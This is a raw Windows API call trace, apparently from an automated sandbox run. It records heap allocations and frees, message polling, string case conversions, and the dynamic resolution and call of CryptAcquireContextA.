RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0163.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0163.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0163.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0163.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0163.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0163.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0163.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0163.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0163.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0163.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0163.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.739] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0163.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0163.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0163.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0163.741] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0163.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0163.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0163.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0163.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0163.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0163.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0163.741] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0163.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0163.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0163.741] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0163.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0163.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0163.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0163.742] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0163.745] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xab2890) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.746] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.747] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.748] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0163.748] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0163.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0163.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0163.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.748] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0163.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0163.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0163.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0163.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0163.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0163.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0163.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0163.749] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0163.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0163.749] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0163.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0163.749] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0163.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0163.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0163.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0163.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0163.749] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0163.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0163.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0163.750] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0163.750] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.750] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0163.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0163.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0163.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0163.751] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0163.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0163.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0163.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0163.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0163.751] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0163.751] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0163.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0163.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0163.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0163.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0163.751] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0163.751] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0163.752] 